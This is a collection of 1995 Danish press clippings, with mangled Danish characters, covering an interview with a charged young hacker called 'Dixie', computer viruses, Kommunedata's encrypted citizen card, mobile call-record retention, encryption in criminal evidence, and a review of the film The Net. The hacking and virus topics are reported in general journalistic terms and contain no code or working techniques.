s†l‘nge man er superhacker og har hjernevindinger til at bryde komplicerede adgangskoder. Men smilet stivner, n†r man en r†kold aften lidt f›r jul kommer hjem og finder to kriminalbetjente, der sidder inde i stuen og venter sammen med far og mor. -H›jst betinget. Det kan aller h›jest blive en betinget dom, n†r han frem til efter en lang og kompliceret fremstilling. ANNONYMITETEN Kunstnernavnet er Dixie. Og mere vil han ikke ud med. Den virkelige id- entitet holder han t‘t til kroppen. Men valget af navn f†r vi lige vendt i luf- ten. Det viser sig, at Dixie rent faktisk ikke ved, at det latinske ord dixi betyder: Jeg har talt. Man kunne ellers meget let forestille sig, at der havde ligget en tanke bag ved navnevalget. For det ville jo v‘re i tr†d med g‘ngs hacker-moral, hvis Dixie begrundede sine bes›g i forskellige computersystemer som et fors›g p† at p†vise, at systemerne er hullede som et d›rslag. Han kom ind - dermed havde han talt. Men valget af kunstnernavn, d‘knavn, hackernavn - hvad man nu vil - var tilf‘ldigt. Dixie opd›bte sig selv efter hovedpersonen i William Gibsons roman Neuromancer, som i slutningen af 80erne fik kultstatus og blev en bibel for s†- kaldte cyber-punks. Desuden er han enten for klarhjernet eller for ‘rlig til at give sine handlinger som hacker en morals overfrakke. HACKERKULTUREN - Det er rigtigt nok at jeg og andre hackere dokumenterede, at der var huller i sikkerhedssystemerne ved at komme ind. Men det var ikke det der var form†let med at hacke, siger Dixie. Hacking er ganske enkelt en kultur, som fortrinsvis lever blandt unge m‘nd med stor erfaring i at bruge en computer. Form†let er at l›se g†der i den r‘kkef›lge de dukker op og fors›ge at komme l‘ngst muligt ind i et system. -Det kan sammenlignes med at spille de tekst- adventure spil, der kom frem som nogle af de f›rste spil til computeren. Der g†r sport i at komme l‘ngst muligt og hver g†de tilskynder dig til at blive ved, tilf›jer han. I virkeligheden var det en lille computer med tilh›rende adventure-spil der fik Dixie i gang med sin specielle interesse. Som 12-†rig fik han en VIC 20 med 5kb ram af sine for‘ldre i julegave. Men det var f›rst efter et par †r ved tasterne og siden en pause p† et par †r - hvor en masse andre ting var mere interessante, for eksempel pigerne i skolen - at facinationen ved at bruge en computer og et modem til at kommunikere med omverden blev bragt til live. Fil- men WarGames spillede p† det tidspunkt millioner ind og blev vist i en hvilken somhelst fl‘kke verden over og inspirerede blandt andet Dixie til at g† p† Net- tet. N‘ste trin i udviklingen bestod i opringninger til elektroniske opslag- stavler, de s†kaldte BBSer. Blandt andet til Ravans Rock, der var et af de f›r- ste steder her i landet, hvor man kunne m›de andre unge mennesker med interesse for Cyber-punk-kulturen. M›der p† nettet blev til venskaber, som ogs† omfattede at man m›dtes privat. Erfarne hackere delte ud af deres viden og fik status som forbillede for de mindre erfarne. En anden foruds‘tning for at f† succes som hacker bestod i at f† fat i gode maskiner. Dixie gik med aviser on anskaffede sig f›rst en 286er, siden en 486er. Dixie oprettede sit eget BBS med blandt andet opskrifter p† at kn‘kke sikkerhedssystemer, som blev hentet ned fra Internet. NYSGERRIGHED Det store skridt for Dixie bestod formentlig i, at han kunne hente Linux - en klon af det professionelle styresystem Unix - p† Internet. Med sit eget Unix system p† pc'en kunne han g›re sig selv til system-administrator. -Man kunne sidde og n›rkle rundt med det i flere timer for at f† det til at k›re. Det medf›rte p† den ene side, at jeg kunne s‘tte mig ind i tankegangen hos en sikkerhedschef i en virksomhed. Men det t‘ndte ogs† min nysgerrighed for at komme ind i store edb-systemer for simpelthen at se, hvordan de var sat op, fort‘ller Dixie. Han blev ogs† en stadig mere integreret del af et milj›. Fik nye venner. Der var dog ikke tale om organiseret hacking, fort‘ller Dixie. Hver hacker havde sit eget dom‘ne. I enkelte tilf‘lde kunne flere hackere skaffe sig adgang til samme maskine, men i de fleste tilf‘lde gav man hinanden arbejdsro og undgik m›jsommeligt at tr‘de hinanden i bedene. Fremgangsm†den, der skulle sikre den enkelte hacker mod at blive afsl- ›ret gik ud p† at bruge s† mange mellemstationer som muligt. Dixie kan ikke fort‘lle, hvordan han bar sig ad eller hvilke maskiner og virksomheder, han selv hackede. F›rst og fremmest fordi han venter p†, at politiet skal f† lagt sidste h†nd p† anklageskriftet, s† sagen kan komme for retten. OMVEJENE Men politiet har tidligere lettet en del af sl›ret over for pressen. Hackerne koblede sig p† Internet via enten universiteter eller gymnasier. Fra udgangspunktet, som eksempelvis kunne v‘re Holte Gymnasium, blev servere fem, seks eller syv forskellige steder i verden brugt som mellemstationer, f›r der blev etableret forbindelse til den virksomhed, som det var hensigten at hacke. Ruten kunne g† over Hamborg, Tel Aviv, London, Sidney, Bombay for eventuelt at ende et sted i USA eller for den sags skyld hjemme i Danmark igen. De mange led p† vejen skulle forhindre politiet i at spore hackerne bagl‘ns. Og med frem- gangsm†den lykkedes det enkelte af hackerne, som er sigtet i Haslev-sagen, at komme ind i en r‘kke s‘rdeles f›lsomme computer-systemer. Dixie oplyser, at han ikke selv har v‘ret inde i de meget store computer-systemer. Men verden fik for alvor ›jnene op, da det viste sig, at andre danske hackere havde kn‘kket adgangskoden til den amerikanske vejrtjenestes computer, som blandt andet leverer oplysninger til luftfartsselskaberne, og siden ogs† skaffede sig vej ind i selve Pentagon. Der var ingen, der kom s‘rligt dybt ind i Pentagons systemer. Men indbruddet i vejrtjenestens computer kunne if›lge politiet have for†rsaget en katastrofe. Hackerne, der kom ind hos vejrtjenesten menes at have v‘ret i stand til at ‘ndre i ops‘tningen af systemet, s† det hele tiden meddelte den sikkerhedsansvarlige, at der ikke var noget galt. Bag de troskyldige meddelelser til sikkerhedschefen om fred og ingen fare, kunne hack- erne bruge supercomputeren til at kn‘kke adgangskoder til andre edb-systemer. -Det er n‘rmest en regel, at jo st›rre et system er, jo flere adgangs- veje er der til systemet og jo lettere er det at komme ind, siger Dixie. Det sikkerhedsm‘ssige problem l† imidlertid i, at maskinen kunne have betydning for data, der eksempelvis skulle bruges til at dirigere lufttrafikken. Indbruddet i vejrtjeneste-computeren kunne s†ledes have f†et alvorlige konsekvenser for fly- sikkerheden, har politiet fremf›rt. POLITI-CHIPS Men legen fik en ende. I slutningen af november er det to †r siden, at Dixie og seks andre unge hackere blev hentet med p† stationen og varet‘gts- f‘ngslet. Dixie husker kriminalbetjentene som meget venlige. -De havde en pose med chips med til mig i bilen. P† stationen var de ogs† im›dekommende. Til at begynde med. Han blev indsat i en celle med en skarp lampe t‘ndt i loftet og fik besked p†, at han lige straks ville blive hentet ind til forh›r. Men der gik timer. N‘ste dag blev han lagt under pres for at angive andre hackere. Senere voksede presset, da politiet opdagede, at der var krypterede filer p† Dixies harddisk. Krypteringen - alts† kodningen - ville udelukke politiet i at l‘se filerne. Politiet p†stod derfor, at de ville s‘tte super-computeren p† Uni-C til at bryde krypteringsn›glen. Politiet sagde samtidig, at den sigtede ville komme til at betale regningen. S† Dixie kunne jo nok forst†, at han ville spare sig selv og sine for‘ldre for en stor udgift ved at komme i tanke om n›glen i en fart. Politiet stod her over for noget helt nyt. P† den ene side af bordet sad de unge m‘nd, der kunne bryde ind i Pentagon fra en pc i b›rnev‘relset. P† den anden side sad kriminalbetjentene, der stadig havde f›dderne solidt plantet i en tidsalder, hvor det prim‘re arbejdsredskab var en elektrisk skrivemaskine. OVER STREGEN I dag ser Dixie selv nogle af sine handlinger som lige over stregen. Det gjorde han ikke dengang, hvor det stod p†, og hvor han var drevet af nys- gerrighed. -Det er da klart at omfattende hacking ikke kan tolereres. Men jeg mener ikke, at det, jeg har gjort, er bare halvt s† alvorligt, som politiet gerne vil bl‘se det op til, siger Dixie. Anholdelserne blev signalet til et op- klaringsarbejde af hidtil usete dimensioner for politiet. Dixies tre computere blev beslaglagt og indholdet af harddiskene skrevet ud - flere millioner ark papir. -For mig at se har politiet kastet sig ud i et langt st›rre arbejde, end de egentlig havde beh›vet. -Jeg er nok kommet i s›gelyset, fordi jeg k›rte et BBS p† min computer med blandt andet informationer om hacking. -Men hovedparten af det, politiet har kunnet finde p† mine harddiske, har v‘ret ganske uskyldige sager fra kon- ferencer om madlavning til erotiske noveller. -Man vil selvf›lgeligt anklage mig for at have spredt oplysninger om at hacke. Men de anklage er st‘rkt over- drevet, for de informationer om hacking, som jeg har haft liggende p† mit BBS, blev hentet ned fra Internet og var i forvejen tilg‘ngelige for alle. -Det er selvf›lgeligt en alvorlig sag at hacke, hvis det sker for pengenes skyld eller af politiske grunde. Jeg har ikke set, at hackere har v‘ret blandet ind i ›konomisk kriminalitet i Danmark, men det kan jo komme, forts‘tter Dixie. -Jeg vil imidlertid forsvare mig med, at jeg ikke har gjort noget for at tjene penge p† det. Jeg har ikke stj†let noget, og jeg har ikke ›delagt noget eller skabt kaos i de maskiner, som jeg har v‘ret inde i. De kriminelle forhold i den store hackersag kan efter Dixies opfattelse sidestilles med den situation, hvor en gruppe unge kravler over hegnet til en afl†st fabriksgrund. -Jeg var personligt kun inde for at se mig omkring. Jen kunne m†ske ikke rigtig bed›mme alvoren selv. Jeg s† blot nogle forhindringer der m†tte overvindes. Og jeg fik aldrig nogen sinde besked p† i direkte vendinger, at jeg var uvelkom- men. Selvom jeg blev opdaget, s† l† sikkerhedsfolkene som spioner og lurede. Jeg fik aldrig besked p†, at jeg bare havde at komme ud. De har selvf›lgelig v‘ret tavse for at lure p† mig og spore mig. Men n†r jeg ikke fik noget at vide, s† fik det mig til at f›le, at det nok ikke var s† alvorligt, siger Dixie. MORALEN -Jeg havde nogle grundregler, som jeg arbejdede efter. De handler om, at du for det f›rste ikke m† arbejde for andre. Der m† heller ikke v‘re penge involveret, og du m† ikke hacke af politiske grunde. Hvis du overskrider en af de grunde som hacker, s† er det, at det bliver farligt. -Jeg kan godt se, at hvis politiet ikke standser hacking, s† vil vi f›r eller siden se, at der er folk, som bruger deres viden for penge. -Jeg har imidlertid ikke gjort noget, som overhoved kommer i n‘rheden af ›konomisk kriminalitet. Derfor mener jeg overhoved ikke, at jeg kan st† til en f‘ngselsdom. Hvis jeg skal d›mmes, kan det aller h›jst blive en lille, betinget dom, siger Dixie s† indtr‘ngende, at man skulle tro, at han allerede talte til dommeren. Hans problem er selvf›lgelig, at en streng dom vil kunne ›del‘gge hans fremtid. Han studerer og en dom vil ikke g›re det lettere at finde job. Dixie fort‘ller, at han har lagt sin gamle fritidsbesk‘ftigelse p† hylden. Men inter- essen for sikkerhedssp›rgsm†l lever stadig i bedste velg†ende. En fremtid for Dixie kunne s†ledes komme til at handle om at skabe sikkerheds-systemer, der ikke kan brydes. Digitale infektioner Politiken, Henrik Palle - 2. November 1995 Af Clive Sharp Computervirus er stadig en trussel mod pc'ernes sundhed. Ogs† selvom sikker computersex er g†et af mode. Hvem husker ikke postyret tilbage i 1992, da Michelangelovirusen var l›s, og folk malede Fanden p† v‘ggen og profeterede om det totale edb-sammenbrud i anledning af den italienske renaissancekunstners f›dselsdag den 6. marts. Virus-programmer [her m† vi nok g† ud fra, at han mener ANTI-virusprogrammer -Red] blev med et slag en vare i h›j kurs - og folk gik rundt og fortalte hinanden historier om, at en af deres venner kendte en, der havde f†et slettet sin harddisk og mistet hele sit n‘sten f‘rdige danskspe- ciale om Utopia-begrebet i Svend Aage Madsens tidlige romaner. S† gik tiden, og glemselen s‘nkede sig over computer-virus-f‘nomenet. Man begyndte igen at bytte disketter med vennerne uden n›dvendigvis af tjekke dem efter med Dr. Solomon, Norton Antivirus Toolkit, McAfee, eller hvad de nu hedder, virusprogrammerne [ANTI-virusprogrammerne, tak! -Red]. WIN95-VIRUS. I forbindelse med lanceringen af Windovs 95 var den der imidlertid igen. Rygterne svirrede om en helt ny type virus, der i mods‘tning til tidlig- ere forekomster af f‘nomenet lagde sig i tekstdokumenter og ikke kun inficerede programfiler - som man havde v‘ret vant til. En bruger p† den amerikanske on- line tjeneste America On Line havde angiveligt p†draget sig virus fra et elek- tronisk brev med titlen 'Good Times'. Og s† k›rte rouletten igen. Ogs† selv om der slet ikke var tale om en rigtig virus, men om en s†kaldt makro - et lille- bitte program, som udf›rer en bestemt funktion i eksempelvis et tekstbehand- lingsprogram eller et regneark. Men selv om frygten for og opm‘rksomheden over for virus bev‘ger sig i b›lger, er det ikke et udtryk for, at virus er et periodisk f‘nomen. De sm† modbydelige programstykker, der kan lave forf‘rdelige ulykker i computerens f›lsomme interne system, er hele tiden iblandt os. Men private brugere bem‘rker m†ske ikke, at de har ubudne g‘ster p† harddisken. Mange virus-former giver nemlig ikke anledning til nogle synderlige symptomer, f›r efter lang tid. Og desuden findes der en r‘kke meget avancerede og effek- tive virus-detektions og - udryddelsesprogrammer, som kan fjerne de digitale bakterier uden de store skadevirkninger. LEGALISER MARIHUANA. Den f›rste computervirus s† dagens lys i midten af firserne, hvor nogle dataloger blev opm‘rksomme p† et lille stykke programkode, som kunne formere sig. Opdagelsen bredte sig, og man fandt ud af, at s†danne sm† programstumper kunne s‘ttes til at udf›re forskellige funktioner. Computervirus var en reali- tet. Og f‘nomenet begyndte at brede sig. I begyndelsen var de fleste virus gan- ske harml›se og forvoldte ikke nogen videre skade p† de inficerede systemer. En forekomst fik meddelelsen 'Legalize marijuana' til at dukker frem p† den infi- cerede computers sk‘rm, en anden fik bogstaverne til at falde ned i bunden af sk‘rmbilledet. Og der findes talrige andre eksempler p† s†danne sp›gefulde vir- us. ANGRIBER STRUKTUREN. Men andre typer, som var langt mere ondsindede meldte ogs† deres an- komst. I dag findes der en 5.000 - 6.000 tusinde forskellige former for com- putervirus med varierende farlighed. Fra milde influenza-fork›lelsesbaciller og til den d›dsensfarlige Ebola Zaire-virus. En af de mest udbredte er Form- virussen. Den l‘gger sig i computerens s†kaldte boot-sektor, og kopier sig der- fra videre til de disketter, som computeren skriver p†, hvis man kopier filer over p† disketter. Og s† er der ellers d›mt epidemi. Man kan have Form virus i lang tid, uden at v‘re klar over det - hvis ikke man har installeret et virus- scanningsprogram. Det er f›rst, n†r det i princippet er for sent, at Form- virussen viser sin tilstedev‘relse. Den angriber computerens - i virkligheden styresystemets - FAT-tabel (File Allocation Table), som indeholder oplysninger om harddiskens struktur med hensyn til placering af informationer. Faktisk kan den finde p† at slette den. Og det vil sige, at computeren ikke l‘ngere kan finde ud af, hvor den har lagt de forskellige filer. Med det beklagelige resul- tat, at disken m† formateres om, hvormed alle informationerne p† den slettes. SIKKERHEDSKOPIER. Helt s† slemt beh›ver det dog ikke at g†. Som n‘vnt findes der en lang r‘kke programmer, der kan restaurere b†de harddiske og floppydisketter - uden at informationerne n›dvendigvis g†r tabt. Det afh‘nger dog af, hvor alvorligt angrebet er. Opdages Form-virussen i tide, kan den fjernes ved, at man kopierer styresystemets skjulte opstartsfiler oven i de angrebne. Af en aller anden gru- nd er det f›rst og fremmest DOS og OS/2-systemer, der har v‘ret genstand for virusprogram›rernes luner. Mac-brugerne har aldrig v‘ret plaget af virus i noget n‘vnev‘rdigt omfang. For privat brugere er virus-angreb naturligvis en ubehagelig foreteelse. Man kan v‘re uheldig og miste alle sine data, hvis man ikke har husket at tage sikkerhedskopier. Og det er ikke alle der husker det, for som der st†r p† en af de fotokopierede sedler, man ser h‘ngende rundt om p† landets kontorer: "Rigtige m‘nd tager ikke sikkerhedskopier". Et sted havde en kynisk personage nedeunder tilf›jet med tusch: "Men de gr‘der ofte". RYSTEN I BUKSERNE. Imidlertid er virus et langt st›rre problem for de store edb-installa- tioner i erhvervslivet, hvor tab af data er 100 procent ensbetydende med tab af (rigtig) mange penge. Da rygterne i sin tid svirrede om virus, var det da ogs† edb-cheferne for post-terminaler, forsikringsselskaber og banker, der rystede mest i bukserne. De ansatte fik besked p†, at de ville blive afskediget, hvis det kom frem, at de havde haft disketter med spil med p† arbejde - eller p† anden m†de kompromitteret virksomhedens edb-sikkerhed. Spredningen af virus var dog st›rst, dengang almindelige menneskers computere endnu ikke som standart var udstyret med harddiske og computerspil kunne v‘re p† en enkelt diskette, som desuden indeholdt systemfiler til dos, s†ledes at spillet kunne k›re dir- ekte fra en diskette. De fleste computervirus angriber nemlig programfiler, dem der hedder .exe eller .com til efternavn [Til efternavn?!? -red]. Og s†danne findes p† disketter med spil og systemfiler. Man regner da ogs† med, at udvek- slingen af spil er den st›rste smittekilde for spredningen af computervirus. VIRUSSKJOLD. Siden de f›rste forekomster af virus har f‘nomenet naturligvis udviklet sig. De programm›re der udvikler virus, er blevet dygtigere, og verden har set virus der hele tiden ‘ndre sig, hvilket g›r dem vanskelige at opdage. Hvis man vil sikre sig mod virus, er der forskellige ting, man b›r g›re. Man b›r instal- lere et s†kaldt virus-skjold p† sin computer. Det er et program, som scanner alle disketter, der bliver sat i computerens diskettedrev, og som hver gang computeren startes unders›ger den interne hukommelse for virus. Desuden b›r man med j‘vne mellemrum lade et virus-scannerprogram scanne harddisken for inficer- ede filer. Og skulle man havde p†draget sig en virus, m† man bide i det sure ‘ble og tjekke alle sine disketter med virus-scanneren. Endelig b›r man opda- tere sin virus-scanner med j‘vne mellemrum, da der hele tiden kommer nye virus til. Anti-virus-programmer findes der adskillige af. Et af de mest popul‘re er McAfees, som Politikens Computerklub distribuerer. Privatliv sikret p† Nettet Politiken, Michael Berg Larsen - 2. November 1995 Af Clive Sharp Kommunedata er klar med 100 procent sikker kommunikation p† Internet - s† sikker at Kommunedata har udlovet en dus›r til dem, der kan kn‘kke koderne. Kun et borgerkort mangler, f›r systemet fungerer. Hidtil har problemer med manglende sikkerhed lagt en d‘mper p† ud- vekslingen af informationer p† Internet - og dermed h‘mmet udviklingen af info- rmationssamfundet. Men nu har Kommunedata l›st problemet ved hj‘lp af et for- holdsvist simpelt og fleksibelt system. Rent teknisk er der derfor ikke l‘ngere de store hindringer for, at vi for eksempel fremover kan sende selvangivelser, flyttemeddelelser, ans›gninger om sociale ydelser og andre fortrolige meddel- elser via for eksempel Internet. Men der er til geng‘ld en stor politisk hur- del. Teknologien i det omdiskuterede borgerkort er nemlig en vigtig del i Kom- munedatas fors›g. I Kommunedatas fors›g fungerer borgerkortet dels som en slags elektro- nisk identifikation og dels som b‘rer af ens personlige krypteringskort. Og uden et borgerkort - ingen sikker kommunikation. Borgerkortet skal monteres i en kortl‘ser, der er forbundet med computeren. Computeren f†r p† den m†de de data, der er n›dvendige for at kryptere informationerne og dermed sikre, at ens e-mail ikke kan opsnappes p† Nettet. Og krypteringsn›glen forlader aldrig bor- gerkortet. Samtidig sikrer borgerkortets software, at der ikke er tvivl om, hvem der har sendt beskeden. Ens e-mail f†r nemlig en elektronisk signatur. Borgerkortet benytter public key-metoden, hvor e-mailer ved hj‘lp af en speciel teknik krypteres og dektypteres uden at afsenderens personlige kryp- teringsn›gle afsl›res. Teknologien er billig. Borgerkort og kortl‘ser koster omkring en 5-600 kroner. Derudover kr‘ves der nogle sm† software-stumper. If›l- ge matematiske beregninger, er sandsynligheden for at koderne kan kn‘kkes uen- delige sm†. Kommunedata udlover derfor en dus›r p† 50.000 kroner, hvis der er nogle, der kan kn‘kke koderne. P† Kommunedatas hjemmeside - http://www.kmd.dk - vil der v‘re en henvisning til en speciel hjemmeside, hvor man kan f† lov at fors›ge sig. Hidtil har virksomheder og offentlige institutioner kommunikeret i lukkede netv‘rk ved hj‘lp af krypteringeprogrammer. Men den l›sning er ikke s‘rlig fleksibel, hvis der for alvor skal gang i udvekslingen af elektroniske dokumenter. Kommunedatas l›sning sikre ‚n krypteringsstandart. Alle kan kommu- nikere med alle. Samtidig er man ikke bundet til at kommunikere fra ‚n com- puter. Med et borgerkort i h†nden kan man for eksempel sende fortrolige e-mails fra skrivebordet p† jobbet eller fra den b‘rbare computer i sommerhuset. FIRMAER FRST. - Der er store kommercielle muligheder i sikker kommunikation i †bne net, mener projektleder Keld Poulsen fra Kommunedatas Innovationsafdeling. Hid- til har erhvervslivet ikke udvekslet elektroniske dokumenter i st›rre omfang. Dels p† grund af sikkerheden, og dels fordi den mest optimale l›sning er, at en virksomhed kan kommunikere med alle andre virksomheder, institutioner og enk- eltpersoner. Men Keld Poulsen har ikke sv‘rt ved at forestille sig, at det nu vil ske - specielt da Kommunedata p† dette omr†de ikke beh›ver vente p†, at politikerne bliver enige om borgerkortet. Han forstiller sig, at virksomhederne i stedet vil kunne blive udstyret med et borgerkort-lignende smartcard, der kan klare de samme opgaver. Keld Pou- lsen understreger dog, at produktet ikke er salgsmodent endnu, men at det hur- tigt kan blive det, hvis der viser sig tilstr‘kkelig stor interesse for det. SKAT Pڈ NETTET. Det tekniske gennembrud vil Kommunedata ogs† bruge til at stimulere debatten om borgerkortet. Det sker sidst i december, hvor Kommunedatas hjemme- side bliver forum for diskusionsgrupper om borgerkort og kryptering. Desuden vil politikere fra alle niveauer f† mulighed til at f† en smagspr›ve p† den nye teknologis muligheder. Allerede nu kan man p† http://www.kmd.dk se, hvordan fremtidens elektroniske skatteberegning m†ske kommer til at se ud. Her kan man taste sine skatteoplysninger ind, og umiddelbart f† lavet en beregning, der viser hvor meget, man burde havde betalt i skat. Indtil videre er skatteberegningen kun lavet for almindelige l›nmodtag- ere, og man skal selv taste alle oplysninger ind. Kigger man lidt i krystal- kuglen og bladrer lidt hastigt i sin kalender, er det ikke sv‘rt at se, hvordan fremtidens ligning kommer til at se ud: N†r man en dag checker sin e-mail, vil der ligge en e-mail fra Told og Skat med en forel›big skatteberegning. Man bli- ver anmodet om at checke tallene p† selvangivelsen og eventuelt p†f›re rettel- ser eller manglende oplysninger. Du trykker p† en tast og sender dermed din selvangivelse retur til Told og Skat - uden et eneste stykke papir involveret. Tal trygt i telefon MobilMagasinet, Susanne Bloch - November 1995 Af Clive Sharp Hvad man taler om i telefonen, kommer ikke andre ved. Tele Danmark Mo- bil gemmer kun de oplysninger, der danner grundlag for telefonregningerne. Det ville v‘re en uhyggelig tanke, hvis alt, hvad der blev udvekslet af tale over telefonen, blev optaget p† b†nd, s† f.eks. myndighederne kunne aflyt- te samtaler, der blev f›rt †r tilbage. Ingen samtaler bliver imidlertidig op- taget. Derimod gemmer Tele Danmark Mobil oplysninger om, hvilken telefoner der har ringet sammen i de sidste fem †r. Hvorn†r opkaldene fandt sted, og hvor l‘nge de varede. Man kan ogs† se, om opkaldet har krydset landegr‘nser. Uden alle disse oplysninger ville det ikke v‘re muligt at udskrive korrekte regnin- ger til kunderne. P† GSM-telefoner kan man envidere se, hvilken sendemast der har opfan- get opkaldet fra GSM-telefonen. Sendemasterne opfanger dog samtaler i helt op til en radius af 50 km., s† det er ikke muligt at udpege det pr‘cise sted, hvor telefonen befandt sig under opkaldet. Oplysningerne fort‘ller kun, hvilken telefoner der har ringet sammen - ikke hvilken personer, der har talt i dem. - Vi gemmer oplysningerne i fem †r af regnskabstekniske †rsager. Loven kr‘ver, at alle virksomheder gemmer materiale, der ligger til grund for regnskabet, siger planl‘gningschef i Tele Danmark Mobil, Susanne Andersen. FORBRYDELSER. Ved opklaring af forbrydelser er politiet af og til interesserede i at f† Tele Danmark Mobil til at oplyse hvilke opkald, der er blevet foretaget fra eller til en mist‘nkts mobiltelefon. -Politiet skal fremvise en dommerkendelse, f›r vi udleverer oplysningerne. Det er kun i forbindelse med alvorlige forbryd- elser, med strafferammer p† seks †rs f‘ngsel eller mere, at dommerkendelser overhovedet kommer p† tale, siger Susanne Andersen. En dommerkendelse kan dog ogs† opn†s ved mindre alvorlige forbrydelser. Med det kr‘ver, at mobilkunden selv giver tilladelse til, at politiet m† unders›ge oplysningerne om samtal- erne. -Vi har en meget stram holdning til hvorn†r og hvilke oplysninger, vi ud- leverer. Selvom en af vores kunder har givet sit samtykke til, at politiet m† s›ge oplysninger, s† udleverer vi dem f›rst til politiet, n†r der foreligger en dommerkendelse, siger Susanne Andersen. SIKKERHED. Oplysningerne om samtalerne ligger gemt p† CD'er, og der er kun f† med- arbejdere, der har adgang til at l‘se dem. S† snart de er over seks m†neder gamle begr‘nses adgangen yderligere. -Det er en sikkerhed for kunderne at vi har mulighed for at g† tilbage og unders›ge deres telefonregninger, hvis der f.eks. er mistanke om fejl. Vi bruger ogs† oplysningerne til at beregne stati- stik og til at skaffe os viden om, hvor i landet der er mest trafik, og hvor der er st›rst behov for bedre d‘kning for mobiltelefoner, siger Susanne Ander- sen. Et sp›rgsm†l om timing at opdage datakriminalitet David Svarrer, ComputerWorld - 3. November 1995 Af Clive Sharp Slet blot mist‘nkelige, krypterede data. Mads Bryde Andersen er varm fortaler for, at der nu skal brydes med gammel retspraksis i datasager. Men hr. Andersens argumenter holder ikke vand: Den datakriminelles ulovlige p†virknin- ger af hans omverden m†, sammen med bevis for, at det er netop d‚n kriminelle, udg›re det samlede bevismateriale. INGEN PROBLEMER. S†fremt den kriminelle anvender krypterede data, er de p† et eller andet tidspunkt ukrypterede under vedkommendes omgang med dem. Det er s†ledes et sp›rgsm†l om timing af efterforskningen at skaffe bevismateriale. Det er underordnet, om den datakriminelle f›r, under eller efter beg†elsen af hand- lingen har krypteret hele eller dele af materialet. Det er op til efterforsk- ningen at dokumentere, hvem der har gjort det, og hvad der er foretaget. Almindelig efterforskningspraksis har ingen problemer her. Kun aflytningskrit- erierne er det her n›dvendigt at ‘ndre p†. Interessant kunne det v‘re, hvis en formodet datakriminel, der krypterede sine data, i stedet blot ved dom fik disse slettet. Hvis den formodede datakriminelle ikke kender hverken kode, ophav eller destination til disse data, kan de jo heller ikke anvendes af ved- kommende, eller viderebringes til andre, og kan da med fordel for vedkommende slettes. GLEMTE PASSWORDS. Der er mange edb-brugere, der glemmer deres passwords, eller hvilken kode, de har krypteret en eller anden pakke med. Hvad ville der ske, hvis myn- dighederne fandt fem krypterede filer hos kriminelle Kurt, og Kurt kun reelt kunne huske koderne til fire af de fem filer? Lad os endvidere antage, at disse fire filer reelt indeholder belastende materiale. Det forhold, at den sidste fil er krypteret, og at Kurt ikke kan huske koden, og at de fire ›vrige filer belaster Kurt, kan ikke danne noget retsgrundlag for at sk‘rpe en straf mod Kurt for en gammel tekstfil, han krypterede p† et eller andet tidspunkt. Der skal m†ske blot en ‘ndring til af lov om aflytning, s†ledes at der kan aflyttes p† begrundet mistanke om informations-kriminalitet. KONFISKERING. Man kunne ogs† ‘ndre straframmen for datatyveri og duplikering, s† de kom p† linie med falskm›ntneri for s† vidt angik tyveri af kreditkort-numre, p† linie med krybskytteri, for s† vidt angik tyveri af data, mv. Falskm›ntneri straffes med op til 10 †r f‘ngsel. Krybskytter kan f† konfiskeret den bil, de har anvendt til hjemtransport af fangsten, foruden naturligvis v†ben, ammuni- tion og andet udstyr. Enhver kriminalsag mod en formodet kriminel b›r kunne afg›res p† de i sagen fremlagte bevisligheder og ikke afh‘nge af den formodede kriminelles st›rre eller mindre samarbejde. Strafferammerne for kriminalitet er s‘dvanligvis fastlagt som et takstsystem med rabat, og man kunne jo blot her tilf›je rabat for samarbejde omkring opklaringen - men det er jo praksis aller- ede, s† hvori forbedringen i hans omvendte bevisbyrde skulle best†, m† Mads Bryde Andersen godt forklare. Forbrydelsens hovedvej Jyllandsposten, Niels Sand›e - 13. November 1995 Af Clive Sharp Computere og Internettet er grundlag for en ny gyserfilm. Alle data om Danske borgere er gemt p† computere. Via telefonkabler kan de i varierende ud- str‘kning hentes frem og ‘ndres af autoriserede personer lige fra politibetj- ente til skattefunktion‘rer. Den virkelighed er baggrundskulissen for den nye amerikanske gyser Nettet, hvor Internettet er forvandlet til forbrydelsens hovedvej. ONDE NRDER. I mods‘tning til vores opfattelse af en kontrolleret virkelighed med computere omgivet af n‘sten fuldt hacker-sikrede brandmure truer de onde n›rder med n‘sten at overtage kontrollen i Nettet. Deres v†ben er et program gemt i et tilsyneladende uskyldigt spil. Programmet giver adgang til ellers topsikrede databaser sp‘ndende fra FBI's registre til det amerikanske atomenergiudvalg. Faktisk er det alt†bnende program p† vej til at blive indf›jet i netop de EDB- brandmure [er det Firewalls som han kalder EDB-brandmure??], der skal sikre de mest f›lsomme databaser mod u›nsket bes›g og manipulering. Filmens hovedperson er den billedsk›nne n›rd Angela Bennett, hvis ene- ste venner holder sig gemt bag tegnede figure p† Internettet med navne som Cyb- erbob og Cinderella. I hendes verden er driften mod at spise ude blevet ersta- ttet med at bestille pizza over internettet. Og den eneste kontakt til arbejds- pladsen er telefonen, mens Angela Bennetts direkte menneskelige forbindelse til omverden begr‘nser sig til bes›g hos sin demente mor. OPSPORER EDB-VIRUS. I sit professionelle liv er Angela Bennett, spiller af Sandra Bullock, den bedste systemanalytiker i firmaet Cathedral Software. Hendes arbejdsplads er hendes hus, hvorfra hun sidder og opspore EDB-virus skjult i spil og hacker ind i tilsyneladende sunde EDB-systemer. Det er en af hendes kolleger, Dale Hessman, fra Cathedral Software, som vender op og ned p† Angela Bennetts liv ved at sende hende en diskette med et tilsyneladende uskyldigt program. Her gemmer sig n›glen til p† forunderlig vis at hacke sig ind i selv de tilsynelad- ende mest sikre databaser. Opdagelsen f†r Dale Hessman til at flyve op til Ang- ela Bennetts hjem, for at de sammen kan unders›ge den mystiske software. Men de onde n›rder er kommet undervejs med opdagelsen. De f†r hacket sig ind i luftfartskontrollens database og narre ad den vej myndighederne til at give Dale Hessman forkerte flyveinstrukser. Det fatale resultat er en direk- te kollision mellem nogle h›je californiske industriskorstene. Fra det ›jeblik starter en gyser, der kommer fuldt p† omdrejningsh›jde med de mest uhyggelige i den mere traditionelle gysergenre. De obligatoriske mord, forf›lgelser og psy- kologiske sp‘ndingsmomenter er blot peppet op med mulighederne for at manipul- ere med personlige data. Et uhyggeligt krydderi, der i politiets arkiver for- vandler Angela Bennett til en forfulgt narkoforbryder med et andet navn, mens en ond n›rd overtager Angela Bennetts navn og identitet. PREMIERE I WEEKENDEN. Filmen havde i weekenden premiere i en r‘kke danske biografer. Nettet er instrueret af Irwin Winkler, der i sin lange karriere har modtaget 12 Osc- ars, herunder for medvirken til film som Rocky og GoodFellas. Den gode n›rd Angela Bennett er blandt andet kendt for filmene Speed og Mens du sov. Politiet sl†s med krypterede diske 